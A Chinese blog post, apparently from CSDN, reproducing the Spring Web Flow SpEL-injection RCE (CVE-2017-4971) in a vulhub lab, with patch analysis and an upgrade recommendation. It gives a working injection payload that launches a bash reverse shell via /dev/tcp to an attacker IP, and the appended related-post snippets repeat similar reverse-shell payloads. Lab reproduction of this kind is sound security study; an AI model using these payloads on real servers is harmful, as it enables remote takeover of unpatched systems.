Spring Web Flow 远程代码执行漏洞(CVE-2017-4971)

于 2025-02-18 12:05:25 发布
阅读量1.5k 收藏 16
点赞数 50
分类专栏: cve 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81574836/article/details/145700227
版权

环境的配置

kali上安装好docker,再拉取vulhub就可以,在vulhub里面找相应的漏洞打开就行。

对漏洞的理解

靶场搭建好就可以直接进行复现了。复现前我们先理解一下这个漏洞产生的原因。

先了解一下Spring Web Flow

它是一个web框架,适用于元素按照规定流程运行的程序。它是构建于Spring MVC上的。

Spring官网中的解释是:

  • 有一个明确的开始和结束点。
  • 用户必须按特定顺序浏览一组屏幕。
  • 直到最后一步,更改才会完成。
  • 一旦完成,就不可能意外地重复交易。

这次我们这个漏洞就是符合这个情况的,一个酒店预订系统,有一个明确的开始和结束点,并且必须按照给定的顺序执行。

我们对RCE也了解点

rce漏洞是可以让攻击者直接向后台服务器远程注入操作系统或者命令来获得一些权限。这种漏洞一般需要知道网站源码,进行分析挖掘。

rce漏洞基础知识链接:RCE代码及命令执行(详解)_rce命令执行-优快云博客

漏洞复现过程

源码分析

从题目运行起来可以知道这是一个订阅酒店的系统应该。

想直接了解这个补丁的去这个链接就行。

Use fixed parser for empty value binding expressions · spring-projects/spring-webflow@57f2ccb · GitHub

从这个补丁发现对addEmptyValueMapping(DefaultMapper mapper, String field, Object model) 这个方法里面的表达式解析的类进行了替换。

直接使用了BeanWrapperExpressionParser 来解析。

然后我找到有两个函数调用了 addEmptyValueMapping 方法

  • addDefaultMappings(DefaultMapper mapper, Set parameterNames, Object model)
  • addModelBindings(DefaultMapper mapper, Set parameterNames, Object model)

发现 bind 方法间接的调用了 addEmptyValueMapping 函数。

因为从补丁修复的地方知道,addEmptyValueMapping函数存在表达式执行的点,我们下来分析一下这个函数

它接收三个参数:

  • DefaultMapper类型的mapper
  • String类型的field,表示要操作的字段名之类的字符串信息。
  • Object类型的model,通常可以理解为包含数据的某个模型对象,可能是业务领域中的实体类实例等,用于从中获取相关数据或者基于它来做映射操作。

从参数和函数里写的调用方法可以发现主要控制field参数来触发漏洞,下面我们就去找有什么地方可以控制filed参数来执行恶意代码。我们再回去看我们刚刚发现用addEmptyValueMappingd
这个函数的那2个函数,发现addDefaultMappings 函数中用到了这个field,我们应该可以控制这个函数中的field来获得web权限。

结果就是,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行。所以触发漏洞条件有两个:

(1)binder节点为空;

(2) useSpringBeanBinding 默认值(false)未修改。

漏洞的利用

知道了上面源码的要求条件,我们来构造恶意参数。

_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/10.2.90.209/10086+0>%261")).start()=vulfocus

输出重定向到对应的地址和端口

bash -i

产生一个bash交互环境。

>&

将联合符号前面的内容与后面相结合,然后一起重定向给后者。

/dev/tcp/47.xxx.xxx.72/2333

Linux环境中所有的内容都是以文件的形式存在的,其实大家一看见这个内容就能明白,就是让目标主机与攻击机47.xxx.xxx.72的2333端口建立一个tcp连接。

参数里有下划线的原因是,上述源代码中有一个判断函数,函数的判断条件中有一个_。

漏洞复现

打开靶场

docker ps来查看端口

先监听我们想到监听的端口。

我们输入相关的端口和ip进入到网站里。

就顺着提示的操作做到最后预定那一块

点击confirm按钮,加入恶意参数反弹shell

最后拿到webshell,复现完成。

影响版本: Spring Web Flow 2.4.0 to 2.4.4

修复的建议就是升级Spring Web Flow版本为更高的版本。

学习链接

附上我学习看的大佬链接

https://paper.seebug.org/322/

视频链接

【漏洞复现与分析(2)CVE-2017-4971】漏洞复现与分析(2)CVE-2017-4971_哔哩哔哩_bilibili

spring框架漏洞整理(Spring WebFlow远程代码执行)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 431
Spring WebFlow远程代码执行 (CVE-2017-4971)Spring WebFlow 远程代码执行 Spring WebFlow 远程代码执行影响范围:Spring WebFlow 2.4.0 - 2.4.4 Spring WebFlow 远程代码执行复现环境:vulhub Spring WebFlow 远程代码执行复现过程:
Spring WebFlow 远程代码执行漏洞CVE-2017-4971
qq_53701412的博客
04-30 1747
一、漏洞描述 Spring WebFlow 在 Model 的数据绑定由于没有明确指定相关 model 的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞。 二、影响版本 Spring WebFlow 2.4.0 – 2.4.4 三、利用流程 1选择左侧用户名登陆 2访问路径 `/hotels/1` 点击 `Book Hotel` 3填写相应信息后点击 `Proceed` 4点击 `Confirm` 抓包 ...
Spring远程代码执行漏洞CVE-2017-4971
tbygadgjsad的博客
03-17 768
运行测试环境:docker-compose up -d 等待环境启动后,访问http://ip:8080,将看到一个酒店预订的页面 首先访问http://ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”:进行抓包 ...
CVE-2017-4971 Spring WebFlow 远程代码执行漏洞
weixin_54376843的博客
08-30 330
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。点击第一个View Hotel按钮,进入页面【也可以登录之后直接进入下面这个页面】登陆后,在输入框输入1,然后点击Find Hotels按钮。点击login,出现一些可用的账号密码,随意选择一组登录。打开BP,点击确认Confirm按钮时,抓包。
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1537
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
Spring WebFlow 远程代码执行漏洞CVE-2017-4971)——漏洞复现
weixin_42090431的博客
11-27 278
(new+java.lang.ProcessBuilder("bash","-c","bash+-i>%26+/dev/tcp/你的IP/21+0>%261")).start()=vulhub。等待环境启动后,访问`http://your-ip:8080`,将看到一个酒店预订的页面,这是spring-webflow官方给的简单示例。
spring框架远程代码执行漏洞(CVE-2017-4971)
Z_l123的博客
03-17 5612
漏洞影响 影响版本:Spring WebFlow 2.4.0 - 2.4.4 漏洞复现 搭建漏洞环境并访问 点击左上角登录,使用左边给的用户名密码登录 登录后 访问 id=1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Proceed” 点击confirm时,进行抓包 使用如下反弹shell的Payload &_(new+java.lang.ProcessBuilder("b.
Spring WebFlow 远程代码执行漏洞 CVE-2017-4971 漏洞复现
ADummy的博客
03-02 280
Spring WebFlow 远程代码执行漏洞CVE-2017-4971) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。 ​ 影响版本 2.4.x 0x02
Spring Web Flow RCE漏洞复现 (CVE-2017-4971
Lucky1youzi的博客
01-02 329
渗透
spring 代码执行 (CVE-2017-4971)
最新发布
Cherish what you have!
01-20 255
SpringWebFlow建立在SpringMVC之上,并允许实现Web应用程序的“流”由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行漏洞。5、post请求包中加入如下payload。3、按需求填好后点击proceed继续。4、点击confirm前开启抓包。2、用左边给出的账号进行登录。6、反弹shell成功。
CVE-2017-4971 Spring Web Flow 远程代码执行漏洞
精品博客,你值得一看~
09-07 1051
当你的应用需要复杂的导航控制,例如向导,在一个比较大的事务过程中去指导用户经过一连串的步骤的时候,SWF将会是一个功能强大的控制器。其中,直接控制field这个值的函数是addDefaultMappings,且未做过滤,而addModelBindings是直接获取的java的一个配置文件,由配置文件来确定是否有 binder 节点,如果有,就无法触发代码执行Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。
CVE-2017-4971-Spring Web Flow RCE漏洞复现
m0_58596609的博客
04-21 2731
CVE-2017-4971-Spring Web Flow RCE漏洞复现
CVE-2017-4971-Spring WebFlow远程代码执行漏洞
weixin_59474029的博客
08-20 375
Spring WebFlow 是一个适用于开发基于流程的应用程序的框架,数据绑定时field被控制,导致SpEL注入,造成任意命令执行漏洞
spring框架远程代码执行漏洞CVE-2017-4971复现
weixin_43736941的博客
08-28 2019
利用vulhub进行漏洞环境搭建 靶机:centos 172.16.2.182 攻击机:kali 172.16.2.173 浏览器访问172.16.2.182:8080 点击左上角登录,用给出的账号进行登录 点击确定时,burp进行抓包 使用如下反弹shell的Payload: &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vul
vulhub中springCVE-2017-4971漏洞复现
yougexiaojiuguan的博客
12-02 874
漏洞复现过程中的记录,也是为了方便自己
spring CVE-2017-4971漏洞复现
shangMD01的博客
03-17 3889
搭建漏洞环境: cd vulhub/spring/CVE-2017-4971 docker-compose up -d 查看容器是否开启: 在浏览器打开网站: 填写合法信息: 此处存在命令执行,可反弹shell 使用如下反弹shell的Payload: _eventId_confirm=&_csrf=57033da7-4538-42ec-9933-e12ac3e97db5&_(new+java.lang.ProcessBuilder("bash","-.
WinRAR远程代码执行漏洞CVE-2023-40477分析与缓解措施
资源摘要信息:"CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC" 知识点详细说明: 1. CVE-2023-40477简介 CVE-2023-40477是一个安全漏洞,它存在于流行的文件压缩软件WinRAR中。WinRAR是一个在个人电脑和服务器上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值